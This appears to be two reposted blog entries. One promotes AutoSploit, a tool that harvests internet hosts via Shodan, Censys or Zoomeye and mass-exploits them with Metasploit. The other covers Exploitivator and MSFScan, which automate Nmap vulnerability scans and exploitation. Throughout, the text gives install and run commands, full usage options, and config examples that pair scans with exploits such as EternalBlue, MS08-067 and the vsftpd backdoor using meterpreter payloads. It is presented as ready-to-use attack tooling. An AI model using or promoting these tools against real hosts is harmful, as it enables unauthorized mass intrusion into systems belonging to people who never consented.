Autosploit: Advanced Remote Host Mass Exploitation

With this tool, you can easily launch an attack on a remote host within a fairly short time. This is made possible due to the availability of Shodan, a powerful search engine that allows you to automatically fish out targets that are connected to a particular network service. Alternatively, you can also use target seeking tools such as Zoomeye and Censys to search out intended targets.

Apart from the automated host searching and collection, AutoSploit also gives you the option of creating your own customized target list. With this option in place, you can effectively launch attack-intended searches on hosts of your choice by manually adding them to your list.

Metasploit Modules and How They Work Together

AutoSploit Features:

• Automated Target Collection
• Customized Target List (allows you to add your own list of targets)
• Metasploit Modules
• Custom user-agent
• Mass exploitations

Supported Platforms:

• Linux
• OS X (must be within virtual environments to properly function)

Dependencies:

This tool relies on the below Python 2.7 modules:

• requests
• psutil

The required dependencies should all be in place after performing an installation with the recommended method, but you can easily install them using pip:

$ pip install -r requirements.txt

Alternatively:

$ pip install requests psutil

Autosploit Install

Install AutoSploit via Docker Compose:

Clone the repo:

$ git clone https://github.com/NullArray/AutoSploit.git

Navigate to the Autosploit directory and run:

$ cd Autosploit/Docker
$ docker-compose run --rm autosploit

Install AutoSploit on Linux (via cloning)

Clone:

$ git clone https://github.com/NullArray/AutoSploit

Navigate to the AutoSploit directory, make the install script executable and install:

$ cd AutoSploit
$ chmod +x install.sh
$ ./install.sh

Usage

To start AutoSploit run:

$ python autosploit.py

This will take you to the available user options that you can choose from.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use

  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests

  --proxy PROTO://IP:PORT
                        run behind a proxy while performing the searches
  --random-agent        use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT
                        pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY
                        pass your search query

exploits:
  arguments to edit your exploits

  -E PATH, --exploit-file PATH
                        provide a text file to convert into JSON and save for
                        later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                        set the configuration for MSF (IE -C default 127.0.0.1
                        8080)
  -e, --exploit         start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else

  --ruby-exec           if you need to run the Ruby executable with MSF use
                        this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your
                        ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

The post AutoSploit: Automated Mass Exploiter appeared first on Tech Chronicles.

This has only been tested on Kali.

It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/

– Install the necessary Kali packages and the PostgreSQL gem for Ruby: apt-get install postgresql libpq-dev git-core gem install pg
– Install current version of the msfrpc Python module from git: git clone git://github.com/SpiderLabs/msfrpc.git msfrpc cd msfrpc/python-msfrpc python setup.py install

Usage

Before running either of the scripts, load msfconsole and start the MSGRPC service.
MSGRPC can be started with msfrpcd in Metasploit as follows: load msgrpc Pass=abc123
The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).
Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.

Exploitivator

Command line usage:

Examples: The application can be run as follows, where ‘10.128.108.178’ is the IP address of the attack machine, ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123

MSFScan

Command line usage: ./msf_scan.py filename ./msf_scan.py filename MSF_DB_Username MSF_DB_Password

Examples: The application can be run as follows, where ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./msf_scan.py hosts.txt msf abc123

To run with ‘hosts.txt’ as a list of target hosts, using the script’s default Metasploit Postgres username(msf) and the script’s default Metasploit Postgres password(abc123): ./msf_scan.py hosts.txt

Config Files

Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks.

MSFScan

The script uses a config file with the name ‘scan_types.cfg’. This contains a list of paths for any Metasploit scans the are to run against the targets. e.g.: auxiliary/scanner/dcerpc/endpoint_mapper auxiliary/scanner/smb/smb_version auxiliary/scanner/x11/open_x11 auxiliary/scanner/discovery/ipv6_multicast_ping auxiliary/scanner/discovery/ipv6_neighbor auxiliary/scanner/smb/smb_login

Exploitivator

This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg). These use ‘##’ as a separator and have the following formats.

exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional – grep command to be used if Nmap’s greppable output is being used]

In the above format:

1. The first section is a label linking the scan to the exploit
2. The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script
3. The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
4. The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a ‘.gnmap’ file

An example file content is shown below: SMB_08-067##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms08-067.nse##-oX ms_08_067.xml SMB_09-050##-p U:137,U:139,T:139,T:445 –script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml SMB_10-054##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms10-054.nse##-oX ms_10_054.xml SMB_10-061##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms10-061.nse##-oX ms_10_061.xml SMB_17-010##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms17-010##-oX ms_17_010.xml DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep “3632/open/tcp//distccd” JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep “1099/open/tcp//rmi VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep “vsftpd 2.3.4”
exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional – Metasploit payload details]

An example file content is shown below: SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none

References

Starting and connecting to MSGRPC: https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc
Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/

The post Exploitivator – Automate Metasploit Scanning And Exploitation appeared first on Tech Chronicles.